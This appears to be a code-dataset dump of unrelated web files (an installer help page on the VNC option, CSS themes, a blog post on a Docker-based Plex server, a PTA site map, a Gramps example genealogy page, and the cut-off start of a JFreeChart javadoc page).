path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
themes/BlankOn/help-install/zh_CN/main::opt::o_vnc.html
mdamt/gfxboot-blankon
<a name="o_vncpassword"/> <h3> <a name="o_vnc">安装程序选项:vnc</a> </h3> <p> To enable the VNC installation, specify the parameters vnc and vncpassword: <ul> <li><em>vnc=1 vncpassword=example</em></li> </ul> </p> <p> The VNC server will be started and you may control YaST2 over any VNC client from a remote system. </p>
html/lib/syntaxhighlighter/styles/shThemeEclipse.css
magnusstahre/bonsai-osx
/** * SyntaxHighlighter * http://alexgorbatchev.com/SyntaxHighlighter * * SyntaxHighlighter is donationware. If you are using it, please donate. * http://alexgorbatchev.com/SyntaxHighlighter/donate.html * * @version * 3.0.83 (Tue, 27 Dec 2011 09:58:26 GMT) * * @copyright * Copyright (C) 2004-2010 Alex Gorbatchev. * * @license * Dual licensed under the MIT and GPL licenses. */ .syntaxhighlighter{background-color:white !important;} .syntaxhighlighter .line.alt1{background-color:white !important;} .syntaxhighlighter .line.alt2{background-color:white !important;} .syntaxhighlighter .line.highlighted.alt1,.syntaxhighlighter .line.highlighted.alt2{background-color:#c3defe !important;} .syntaxhighlighter .line.highlighted.number{color:white !important;} .syntaxhighlighter table caption{color:black !important;} .syntaxhighlighter .gutter{color:#787878 !important;} .syntaxhighlighter .gutter .line{border-right:3px solid #d4d0c8 !important;} .syntaxhighlighter .gutter .line.highlighted{background-color:#d4d0c8 !important;color:white !important;} .syntaxhighlighter.printing .line .content{border:none !important;} .syntaxhighlighter.collapsed{overflow:visible !important;} .syntaxhighlighter.collapsed .toolbar{color:#3f5fbf !important;background:white !important;border:1px solid #d4d0c8 !important;} .syntaxhighlighter.collapsed .toolbar a{color:#3f5fbf !important;} .syntaxhighlighter.collapsed .toolbar a:hover{color:#aa7700 !important;} .syntaxhighlighter .toolbar{color:#a0a0a0 !important;background:#d4d0c8 !important;border:none !important;} .syntaxhighlighter .toolbar a{color:#a0a0a0 !important;} .syntaxhighlighter .toolbar a:hover{color:red !important;} .syntaxhighlighter .plain,.syntaxhighlighter .plain a{color:black !important;} .syntaxhighlighter .comments,.syntaxhighlighter .comments a{color:#3f5fbf !important;} .syntaxhighlighter .string,.syntaxhighlighter .string a{color:#2a00ff !important;} .syntaxhighlighter .keyword{color:#7f0055 !important;} .syntaxhighlighter .preprocessor{color:#646464 !important;} .syntaxhighlighter .variable{color:#aa7700 !important;} .syntaxhighlighter .value{color:#009900 !important;} .syntaxhighlighter .functions{color:#ff1493 !important;} .syntaxhighlighter .constants{color:#0066cc !important;} .syntaxhighlighter .script{font-weight:bold !important;color:#7f0055 !important;background-color:none !important;} .syntaxhighlighter .color1,.syntaxhighlighter .color1 a{color:gray !important;} .syntaxhighlighter .color2,.syntaxhighlighter .color2 a{color:#ff1493 !important;} .syntaxhighlighter .color3,.syntaxhighlighter .color3 a{color:red !important;} .syntaxhighlighter .keyword{font-weight:bold !important;} .syntaxhighlighter .xml .keyword{color:#3f7f7f !important;font-weight:normal !important;} .syntaxhighlighter .xml .color1,.syntaxhighlighter .xml .color1 a{color:#7f007f !important;} .syntaxhighlighter .xml .string{font-style:italic !important;color:#2a00ff !important;}
2016/11/12/uflix/index.html
illegalprime/illegalprime.github.io
<!DOCTYPE html> <html> <head> <!-- CSS --> <link rel="stylesheet" href="/assets/css/main.css"> <title> µflix: Easy Plex Server &middot; Michael's Normcore Blog </title> <!-- Metadata --> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="mobile-web-app-capable" content="yes"> <meta name="HandheldFriendly" content="True" /> <meta name="MobileOptimized" content="320" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="/favicon.png"> <!-- Theme Color for Chrome on Android Lollipop --> <meta name="theme-color" content="#52be80"> </head> <body> <!-- Header --> <div class="animated fadeIn top-level-header "> </div> <div class="header-image" style="background-image: url(' /assets/images/cover.jpg ');"> &nbsp; </div> <div class="toplevel-content"> <div class="container"> <div class="middle top-menu"> <a class="menu-item fadeInDown animated" href="/">blog</a> <a class="menu-item fadeInDown animated" href="/tags">archive</a> <a class="menu-item fadeInDown animated" href="/portfolio">projects</a> <a class="menu-item fadeInDown animated" href="/about">me</a> </div> <div class="middle"> <div class="article animated fadeIn "> <div class="post-title-container"> <h1 class="post-title"><b>µflix: Easy Plex Server</b></h1> <p></p> <div class="post-list-tags"> <a href="/tag/code"> <span class="tag new badge">code</span> </a> <a href="/tag/linux"> <span class="tag new badge">linux</span> </a> </div> </div> <p>Movies are really <strong>really</strong> great.</p> <p>Ever since I started to prepare for the great apocalypse that will wipe the world of sin I thought to myself: “Wouldn’t it be <strong>really</strong> great if I could keep all the movies I love? So my children, and my children’s children will think I’m cool?” Keeping with the sin theme I decided to use <a href="https://plex.tv">Plex</a>, a non-FOSS Media Server, to ensure that my taste outlives me.</p> <p>So if you love hoarding movies (but don’t watch hoarders) and preparing for the end (but haven’t seen that reality show about that) you’ll love my new Plex container which is <em>dead simple</em> to use.</p> <p>The project is <a href="https://github.com/illegalprime/uflix">hosted on GitHub</a> and is built on Docker. If you’re unfamiliar with Docker, its a container framework, and containers are kernel namespaces. The important metaphor here is that containers are like shipping containers: standardized, plug-n-play, and (sometimes) have lots of wasted space. Basically you get an app running with all the dependencies, configuration, etc. done for you! And its really easy to get rid of afterward (unlike KDE, but I’m excited to try out NixOS, which is another solution to the KDE problem)!</p> <p>After <a href="https://docs.docker.com/engine/installation/linux/ubuntulinux/">installing docker</a> all you need to set up your server is:</p> <div class="language-bash highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/illegalprime/uflix.git <span class="nb">cd </span>uflix sudo ./build </code></pre> </div> <h2 id="its-got-features">Its got features!</h2> <ul> <li>No Configuration!</li> <li>Easy to deploy, remove, and copy.</li> <li>Just re-run <code class="highlighter-rouge">sudo ./build</code> to update!</li> <li>Supports local discovery with <code class="highlighter-rouge">avahi</code>!</li> <li>Mount as many drives or directories as you want with command line args</li> <li>SSH Access to poke around</li> </ul> <p>To run simply call:</p> <div class="language-bash highlighter-rouge"><pre class="highlight"><code>sudo ./start --metadata &lt;plex metadata dir / disk&gt; </code></pre> </div> <p>The only required command line arg is where to store the Plex metadata. This makes it easy to clone servers since you only need to copy your data drives.</p> <p>Even with all this cool tech a more serious question remains, if we could <em>only</em> save one terabyte of movies for the future which ones would they be?</p> <p>I have my list. Do you?</p> <br/> <div class="post-footer"> <p> — Michael </p> <div class="social"> <a href="/feed.xml"><i class="fa fa-rss" aria-hidden="true"></i></a> <a href="https://github.com/illegalprime/"> <i class="fa fa-github" aria-hidden="true"></i> </a> <a href="https://matrix.to/#/@illegalprime:matrix.org"> <i class="fa fa-comments" aria-hidden="true"></i> </a> </div> </div> <hr> <br/> <!-- Disqus Comments Box --> <h2><b>Say It Loud! Leave a comment below:</b></h2> <div id="disqus_thread"></div> <script> var disqus_config = function () { this.page.url = "https://oddoreden.com/2016/11/12/uflix/"; this.page.identifier = "_2016_11_12_uflix_"; }; (function() { // DON'T EDIT BELOW THIS LINE var d = document, s = d.createElement('script'); s.src = '//icanteden.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> <noscript>Enable JavaScript to view comments.</noscript> </div> </div> </div> </div> <footer> </footer> </body> </html>
oldsite/sitemap.html
slb535/mckenziepta-2011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>McKenzie PTA Wilmette Illinois</title> <link href="Formats.css" rel="stylesheet" type="text/css" /> <style type="text/css"> <!-- body { background-image: url(Images/Background_1.jpg); margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="/Formats.css" rel="stylesheet" type="text/css" /> <style type="text/css"> <!-- .style4 {color: #990066} .style11 {color: #319DCE} --> </style> <script src="SpryAssets/SpryMenuBar.js" type="text/javascript"></script> <script type="text/javascript"> <!-- function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } //--> </script> <style type="text/css"> <!-- .style62 {color: #000000; } .style75 {color: #FFFFFF; font-family: Arial, Helvetica, sans-serif; } .style15 {color: #329CCC} .style16 {color: #2F9BCC} --> </style> <style type="text/css"> <!-- .style19 {font-size: 14px; text-decoration: none; line-height: normal; font-weight: normal; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; color: #319DCE; } --> </style> <link href="SpryAssets/SpryMenuBarHorizontal.css" rel="stylesheet" type="text/css" /> <link href="SpryAssets/SpryMenuBarVertical.css" rel="stylesheet" type="text/css" /> </head> <body> <table width="900" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td><a href="index.html"><img src="Images/Background_2.jpg" width="900" height="112" border="0" /></a></td> </tr> <tr> <td height="53" align="center" valign="middle" bgcolor="#98CEE6"> <div align="center"> <ul id="MenuBar1" class="MenuBarHorizontal"> <li><a href="index.html">HOME </a> </li> <li><a href="#" class="MenuBarItemSubmenu">PROGRAMS &amp; EVENTS </a> <ul> <li><a href="beyond_pta.html" class="MenuBarItemSubmenu">Parent Education</a> <ul> <li><a href="parent_learning_network.html">Parent Learning Network</a></li> <li><a href="http://fan-ntts.ntnow.org/">Family Awareness Network</a></li> <li><a href="http://www.peccalendar.org/">PEC Monthly Calendar</a></li> </ul> </li> <li><a href="birthday_book.html">Birthday Books</a></li> <li><a href="chess_club.html">Chess Club</a></li> <li><a href="mcclubs/index.html">McClubs</a></li> <li><a href="open_gym.html">Open Gym</a></li> </ul> </li> <li><a href="committees.html">COMMITTEES </a> </li> <li><a href="#" class="MenuBarItemSubmenu">FORMS &amp; INFORMATION</a> <ul> <li><a href="communication.html">Communication</a></li> <li><a href="treasurer.html">Treasurer</a></li> <li><a href="membership.html">Membership</a></li> <li><a href="operations.html">Operations</a></li> <li><a href="archives.html">Archives</a></li> <li><a href="faq.html">F.A.Q.</a></li> </ul> </li> <li><a href="#" class="MenuBarItemSubmenu">POLICIES &amp; GUIDELINES</a> <ul> <li><a href="Archives/FromsDocuments/McK_pta_bylaws_020811.pdf">BYLAWS</a></li> <li><a href="Archives/FromsDocuments/LetsGoMcKenzieGuide2010web.pdf">GETTING TO KNOW McKENZIE</a></li> </ul> </li> <li><a href="contact.html">CONTACT US</a></li> </ul> </div></td> </tr> <tr> <td align="center" valign="top" bgcolor="#FFFFFF"><table width="600" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"><p>&nbsp;</p> <p class="general_body_header">Site Map</p> <table width="500" border="0" cellspacing="15" cellpadding="15"> <tr> <td width="42">&nbsp;</td> <td width="353">coming soon...</td> </tr> <tr> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td class="general_body_subheader">&nbsp;</td> </tr> </table> <p>&nbsp;</p> </td> </tr> </table> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p align="center" class="footer"><strong>Email <a href="mailto:AskCheetah@McKenziePTA.com" class="style11">AskCheetah@McKenziePTA.com</a> with any PTA related questions or concerns.</strong></p> <p align="center" class="footer"><a href="index.html" class="footer">home</a> | <a href="sitemap.html" class="footer">site map</a> | <a href="archives.html" class="footer">archives</a> | <a href="mailto:WebMaster@McKenziePTA.com" class="footer">web administrator</a> | <a href="Archives/FromsDocuments/LetsGoMcKenzieGuide2010web.pdf" class="footer">school guide</a></p> <p align="center" class="general_body"></p> <p align="center" class="general_body">&nbsp;</p> </td> </tr> </table> <script type="text/javascript"> <!-- var MenuBar1 = new Spry.Widget.MenuBar("MenuBar1", {imgDown:"SpryAssets/SpryMenuBarDownHover.gif", imgRight:"SpryAssets/SpryMenuBarRightHover.gif"}); //--> </script> </body> </html>
gramps42/gramps/example_NAVWEB1/ppl/t/j/J92KQCFE0HMFGQ03JT.html
belissent/testing-example-reports
<!DOCTYPE html> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-US"> <title>My Family Tree - Cunningham, Sally Sarah</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> <link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">My Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../families.html" title="Families">Families</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../repositories.html" title="Repositories">Repositories</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> <li><a href="../../../addressbook.html" title="Address Book">Address Book</a></li> </ul> </div> </div> <div class="content" id="IndividualDetail"> <h3>Cunningham, Sally Sarah<sup><small> <a href="#sref1">1</a></small></sup></h3> <div id="summaryarea"> <table class="infolist"> <tr> <td class="ColumnAttribute">Birth Name</td> <td class="ColumnValue"> Cunningham, Sally Sarah </td> </tr> <tr> <td class="ColumnAttribute">Gramps&nbsp;ID</td> <td class="ColumnValue">I0464</td> </tr> <tr> <td class="ColumnAttribute">Gender</td> <td class="ColumnValue">female</td> </tr> <tr> <td class="ColumnAttribute">Age at Death</td> <td class="ColumnValue">61 years, 4 months, 24 days</td> </tr> </table> </div> <div class="subsection" id="events"> <h4>Events</h4> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Birth </td> <td class="ColumnDate">1805-09-25</td> <td class="ColumnPlace"> <a href="../../../plc/b/r/R92KQCHJHYWI3HRVRB.html" title="Canon City, CO, USA"> Canon City, CO, USA </a> </td> <td class="ColumnDescription"> Birth of Cunningham, Sally Sarah </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> <tr> <td class="ColumnEvent"> Death </td> <td class="ColumnDate">1867-02-19</td> <td class="ColumnPlace"> <a href="../../../plc/w/h/192KQC6R3Z8S89HMHW.html" title="San Diego, San Diego, CA, USA"> San Diego, San Diego, CA, USA </a> </td> <td class="ColumnDescription"> Death of Cunningham, Sally Sarah </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> <tr> <td class="ColumnEvent"> Burial </td> <td class="ColumnDate">&nbsp;</td> <td class="ColumnPlace"> <a href="../../../plc/a/t/JKUJQCQ6IUY6JTBXTA.html" title="Guaynabo, PR, USA"> Guaynabo, PR, USA </a> </td> <td class="ColumnDescription"> Burial of Cunningham, Sally Sarah </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </div> <div class="subsection" id="parents"> <h4>Parents</h4> <table class="infolist"> <thead> <tr> <th class="ColumnAttribute">Relation to main person</th> <th class="ColumnValue">Name</th> <th class="ColumnValue">Relation within this family (if not by birth)</th> </tr> </thead> <tbody> </tbody> <tr> <td class="ColumnAttribute">Father</td> <td class="ColumnValue"> <a href="../../../ppl/k/i/2C2KQCYKETRCKNEUIK.html">Cunningham, William Philip<span class="grampsid"> [I0467]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">Mother</td> <td class="ColumnValue"> <a href="../../../ppl/b/h/CD2KQCWNA8KIVBAWHB.html">Park, Susannah<span class="grampsid"> [I0468]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/t/j/J92KQCFE0HMFGQ03JT.html">Cunningham, Sally Sarah<span class="grampsid"> [I0464]</span></a></td> <td class="ColumnValue"></td> </tr> </table> </div> <div class="subsection" id="families"> <h4>Families</h4> <table class="infolist"> <tr class="BeginFamily"> <td class="ColumnType">&nbsp</td> <td class="ColumnAttribute">&nbsp</td> <td class="ColumnValue"><a href="../../../fam/g/e/69VJQCQTZ5HATCIBEG.html" title="Family of Blake, George and Cunningham, Sally Sarah">Family of Blake, George and Cunningham, Sally Sarah<span class="grampsid"> [F0105]</span></a></td> </tr> <tr class="BeginFamily"> <td class="ColumnType">Married</td> <td class="ColumnAttribute">Husband</td> <td class="ColumnValue"> <a href="../../../ppl/2/w/L82KQC1IWB1KHMCJW2.html">Blake, George<span class="grampsid"> [I0463]</span></a> </td> </tr> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">&nbsp;</td> <td class="ColumnValue"> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Marriage </td> <td class="ColumnDate">1831-12-15</td> <td class="ColumnPlace">&nbsp;</td> <td class="ColumnDescription"> Marriage of Blake, George and Cunningham, Sally Sarah </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </td> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">Children</td> <td class="ColumnValue"> <ol> <li> <a href="../../../ppl/w/t/I8VJQCNTR40JLJKXTW.html">Blake, M. Susannah<span class="grampsid"> [I0067]</span></a> </li> </ol> </td> </tr> </tr> </table> </div> <div class="subsection" id="familymap"> <h4>Family Map</h4> <a class="familymap" href="../../../maps/t/j/J92KQCFE0HMFGQ03JT.html" title="Family Map">Family Map</a> </div> <div class="subsection" id="pedigree"> <h4>Pedigree</h4> <ol class="pedigreegen"> <li> <a href="../../../ppl/k/i/2C2KQCYKETRCKNEUIK.html">Cunningham, William Philip<span class="grampsid"> [I0467]</span></a> <ol> <li class="spouse"> <a href="../../../ppl/b/h/CD2KQCWNA8KIVBAWHB.html">Park, Susannah<span class="grampsid"> [I0468]</span></a> <ol> <li class="thisperson"> Cunningham, Sally Sarah <ol class="spouselist"> <li class="spouse"> <a href="../../../ppl/2/w/L82KQC1IWB1KHMCJW2.html">Blake, George<span class="grampsid"> [I0463]</span></a> <ol> <li> <a href="../../../ppl/w/t/I8VJQCNTR40JLJKXTW.html">Blake, M. Susannah<span class="grampsid"> [I0067]</span></a> </li> </ol> </li> </ol> </li> </ol> </li> </ol> </li> </ol> </div> <div class="subsection" id="tree"> <h4>Ancestors</h4> <div id="treeContainer" style="width:735px; height:602px;"> <div class="boxbg female AncCol0" style="top: 269px; left: 6px;"> <a class="noThumb" href="../../../ppl/t/j/J92KQCFE0HMFGQ03JT.html"> Cunningham, Sally Sarah </a> </div> <div class="shadow" style="top: 274px; left: 10px;"></div> <div class="bvline" style="top: 301px; left: 165px; width: 15px"></div> <div class="gvline" style="top: 306px; left: 165px; width: 20px"></div> <div class="boxbg male AncCol1" style="top: 119px; left: 196px;"> <a class="noThumb" href="../../../ppl/k/i/2C2KQCYKETRCKNEUIK.html"> Cunningham, William Philip </a> </div> <div class="shadow" style="top: 124px; left: 200px;"></div> <div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 151px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 156px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 44px; left: 386px;"> <a class="noThumb" href="../../../ppl/r/l/YD2KQCZC7LCXIX5RLR.html"> Cunningham, Peter Sr. </a> </div> <div class="shadow" style="top: 49px; left: 390px;"></div> <div class="bvline" style="top: 76px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 81px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 76px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 81px; left: 375px; height: 75px;"></div> <div class="boxbg female AncCol2" style="top: 194px; left: 386px;"> <a class="noThumb" href="../../../ppl/3/r/889KQC80UAKGI4B2R3.html"> Dunn, Margaret Mary? </a> </div> <div class="shadow" style="top: 199px; left: 390px;"></div> <div class="bvline" style="top: 226px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 231px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 156px; left: 375px; height: 75px;"></div> <div class="boxbg female AncCol1" style="top: 419px; left: 196px;"> <a class="noThumb" href="../../../ppl/b/h/CD2KQCWNA8KIVBAWHB.html"> Park, Susannah </a> </div> <div class="shadow" style="top: 424px; left: 200px;"></div> <div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 451px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 456px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 344px; left: 386px;"> <a class="noThumb" href="../../../ppl/8/x/0F2KQC3Z0BOSGLKRX8.html"> Park, James </a> </div> <div class="shadow" style="top: 349px; left: 390px;"></div> <div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div> </div> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1"> Import from test2.ged <span class="grampsid"> [S0003]</span> </a> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25<br />Created for <a href="../../../ppl/h/o/GNUJQCL9MD64AM56OH.html">Garner von Zieliński, Lewis Anderson Sr</a> </p> <p id="copyright"> </p> </div> </body> </html>
templates/zt_meda25/css/colors/blue.css
yuri12015/leluan
/** * @version 1.5.x * @package ZooTemplate Project * @email webmaster@zootemplate.com * @copyright (C) 2011 http://www.ZooTemplate.com. All rights reserved. */ a { color: #0592cc; } a:hover, a:active, a:focus { color: #0592cc; } #zt-logo{ background:url('../../images/colors/blue/logo.png') no-repeat left top; } #zt-header { background:#dcdcdc url("../../images/colors/blue/bg-header.png") repeat-x left bottom; } .button { background:#47d0f2; border: 1px solid #2599ca; } #zt-footer-menu li a { color: #0592cc; } #zt-userwrap5-inner .button { background:#0592cc !important; border: 1px solid #2599ca !important; } ul#mainlevel li a:hover, ul.menu li a:hover { color:#0592cc; text-decoration:none; background:url('../../images/colors/blue/arrow-hover.png') no-repeat left 50%; } #zt-userwrap5-inner ul li a:hover{ color:#0592cc; } .rtl ul#mainlevel li a:hover, .rtl ul.menu li a:hover { background:url('../../images/colors/blue/arrow-hover.png') no-repeat right 50%; } ul.menu2 li a:hover { background: url("../../images/colors/blue/arrow-hover.png") no-repeat scroll left 50%; } .rtl ul.menu2 li a:hover { background: url("../../images/colors/blue/arrow-hover.png") no-repeat scroll right 50%; } a.readon2 { background: url("../../images/readon2.png") no-repeat left top; } a.readon2 span { background: url("../../images/readon2.png") no-repeat right -46px; } .readon3 { background: url("../../images/colors/blue/bg-readmore2.png") no-repeat right 50%; color: #0592cc; } #zt-col3 div.latestnewsitems h4 a:hover { color: #0592cc; } #zt-slideshow-inner .handles .active { background: url("../../images/colors/blue/handles-active.png") no-repeat left top; } a.readon { background: url("../../images/colors/blue/readon.png") no-repeat left top; } a.readon span { background: url("../../images/colors/blue/readon.png") no-repeat right -46px; } #menusys_mega li:hover a, #menusys_mega li:active a, #menusys_mega li:focus a, #menusys_mega li a.active, #menusys_mega li a.active:hover, #menusys_mega li a.active:active, #menusys_mega li a.active:focus { background:url('../../images/colors/blue/bg-menu-active.png') no-repeat left 0; } #menusys_mega li:hover a .menu-title, #menusys_mega li:active a .menu-title, #menusys_mega li:focus a .menu-title, #menusys_mega li a.active .menu-title, #menusys_mega li a.active:hover .menu-title, #menusys_mega li a.active:active .menu-title, #menusys_mega li a.active:focus .menu-title { background:url('../../images/colors/blue/bg-menu-active.png') no-repeat right -46px; } #menusys_mega .subarrowtop { background: url("../../images/colors/blue/megamenu/arrow.png") no-repeat left top; } #menusys_mega .subwraptop { background: url("../../images/colors/blue/megamenu/top-center.png") repeat-x left top; } #menusys_mega .subwraptop .subwraptop-left { background: url("../../images/colors/blue/megamenu/top-left.png") no-repeat left top; } #menusys_mega .subwraptop .subwraptop-right { background: url("../../images/colors/blue/megamenu/top-right.png") no-repeat right top; } #menusys_mega .subwrapcenter { background: url("../../images/colors/blue/megamenu/mid-center.png") repeat-x left top #35b7e9; } #menusys_mega .subwrapbottom .subwrapbottom-left { background: url("../../images/colors/blue/megamenu/bot-left.png") no-repeat left top; } #menusys_mega .subwrapbottom .subwrapbottom-right { background: url("../../images/colors/blue/megamenu/bot-right.png") no-repeat right top; } #menusys_mega .subwrapbottom { background: url("../../images/colors/blue/megamenu/bot-center.png") repeat-x left top; } #menusys_mega .megacol ul li { background: url("../../images/colors/blue/megamenu/bg-list-button.png") repeat-x left bottom; } #menusys_mega .mega-group .no-image{ background: url("../../images/colors/blue/megamenu/bg-list-button.png") repeat-x left bottom; } #menusys_mega .megacol ul li a span.no-image { background: url("../../images/colors/blue/megamenu/arrow2.png") no-repeat 0 50%; } #menusys_mega .megacol ul li a:hover span.no-image, #menusys_mega .megacol ul li a:active span.no-image, #menusys_mega .megacol ul li a:focus span.no-image, #menusys_mega .megacol ul li a.active span.no-image, #menusys_mega .megacol ul li a.active:hover span.no-image, #menusys_mega .megacol ul li a.active:active span.no-image, #menusys_mega .megacol ul li a.active:focus span.no-image { background: url("../../images/colors/blue/megamenu/arrow2-hover.png") no-repeat left 50%; } #menusys_mega div.items .item { background: url("../../images/colors/blue/megamenu/bg-list-button.png") repeat-x left bottom; } #menusys_mega div.items .item:hover { background: url("../../images/colors/blue/megamenu/bg-list-button.png") repeat-x left bottom #43bceb; } #menusys_mega div.items .item .caption { background:#9ADBF4; } /*right to left*/ .rtl #menusys_mega .megacol ul li a span.no-image { background: url("../../images/colors/blue/megamenu/arrow2.png") no-repeat right 50%; } .rtl #menusys_mega .megacol ul li a:hover span.no-image, .rtl #menusys_mega .megacol ul li a:active span.no-image, .rtl #menusys_mega .megacol ul li a:focus span.no-image, .rtl #menusys_mega .megacol ul li a.active span.no-image, .rtl #menusys_mega .megacol ul li a.active:hover span.no-image, .rtl #menusys_mega .megacol ul li a.active:active span.no-image, .rtl #menusys_mega .megacol ul li a.active:focus span.no-image{ background:url("../../images/colors/blue/megamenu/arrow2-hover.png") no-repeat right 50%; } #zt-slideshow-inner .jvcarousel_mtitle { color: #0D9FDC; } #zt-col1 .free { background: url("../../images/colors/blue/bg-free.png") no-repeat left top; }
Trabalho PID2013/libs/jfreechart-1.0.14-javadocs/src-html/org/jfree/data/xml/DatasetTags.html
jclazzarim/TrabalhoPID2013
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>Source code</title> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <div class="sourceContainer"> <pre><span class="sourceLineNo">001</span>/* ===========================================================<a name="line.1"></a> <span class="sourceLineNo">002</span> * JFreeChart : a free chart library for the Java(tm) platform<a name="line.2"></a> <span class="sourceLineNo">003</span> * ===========================================================<a name="line.3"></a> <span class="sourceLineNo">004</span> *<a name="line.4"></a> <span class="sourceLineNo">005</span> * (C) Copyright 2000-2011, by Object Refinery Limited and Contributors.<a name="line.5"></a> <span class="sourceLineNo">006</span> *<a name="line.6"></a> <span class="sourceLineNo">007</span> * Project Info: http://www.jfree.org/jfreechart/index.html<a name="line.7"></a> <span class="sourceLineNo">008</span> *<a name="line.8"></a> <span class="sourceLineNo">009</span> * This library is free software; you can redistribute it and/or modify it<a name="line.9"></a> <span class="sourceLineNo">010</span> * under the terms of the GNU Lesser General Public License as published by<a name="line.10"></a> <span class="sourceLineNo">011</span> * the Free Software Foundation; either version 2.1 of the License, or<a name="line.11"></a> <span 